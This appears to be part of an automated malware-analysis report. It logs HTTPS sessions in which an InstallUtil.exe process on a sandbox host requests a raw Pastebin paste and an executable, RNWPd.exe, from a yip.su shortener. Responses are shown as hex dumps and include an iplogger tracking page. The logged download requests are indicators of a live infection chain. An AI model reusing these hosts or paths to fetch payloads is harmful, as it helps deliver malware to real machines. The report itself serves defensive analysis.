                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:01:31 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WivIGbJ0UVDsHqMLHMbBjJRq3MTTAw5I4UywSrzrDY8uvtFdOZGE4OKWktr8XZv2IEpZ4Od%2F6IleGn20SDjzWg%2FNmPSdCK0RVMDtDwrvK6JtSVUpeN0dx64%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aae8c5905c359-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-09 21:01:31 UTC471INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                2024-08-09 21:01:31 UTC1369INData Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d
                                                Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
                                                2024-08-09 21:01:31 UTC1369INData Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e
                                                Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
                                                2024-08-09 21:01:31 UTC1369INData Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f
                                                Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
                                                2024-08-09 21:01:31 UTC1369INData Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61
                                                Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
                                                2024-08-09 21:01:31 UTC1369INData Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f
                                                Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
                                                2024-08-09 21:01:31 UTC154INData Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:01:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                16192.168.2.649739172.67.19.244434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:01:36 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:36 UTC222INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:36 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aaeac9ae58c0f-EWR
                                                2024-08-09 21:01:36 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                2024-08-09 21:01:36 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                                Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                                2024-08-09 21:01:36 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                                2024-08-09 21:01:36 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                                Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                                2024-08-09 21:01:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                17192.168.2.649740188.114.96.34434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:01:36 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:36 UTC904INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:36 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:01:36 GMT
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: HIT
                                                Age: 0
                                                Last-Modified: Fri, 09 Aug 2024 21:01:36 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2F1dcJgKObQsiDFjfnmK8RK9IKIP5iGDr7U%2BaJdEtCdA1Kg3F7%2BfJqF%2FZnD6ony9DJjOAR7ZUBkxyn4SIRkBIBPWIgMiAenBrGgJpgkAZRwqi1FFUxTddRE%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aaeb099fe0ca2-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-09 21:01:36 UTC465INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                2024-08-09 21:01:36 UTC1369INData Raw: 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f
                                                Data Ascii: t-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta pro
                                                2024-08-09 21:01:36 UTC1369INData Raw: 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65
                                                Data Ascii: und-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-de
                                                2024-08-09 21:01:36 UTC1369INData Raw: 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e
                                                Data Ascii: .userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(n
                                                2024-08-09 21:01:36 UTC1369INData Raw: 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72
                                                Data Ascii: ><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;bor
                                                2024-08-09 21:01:36 UTC1369INData Raw: 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20
                                                Data Ascii: 31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div
                                                2024-08-09 21:01:36 UTC160INData Raw: 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: .style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:01:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                18192.168.2.649741172.67.19.244434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:01:41 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:41 UTC222INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:41 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
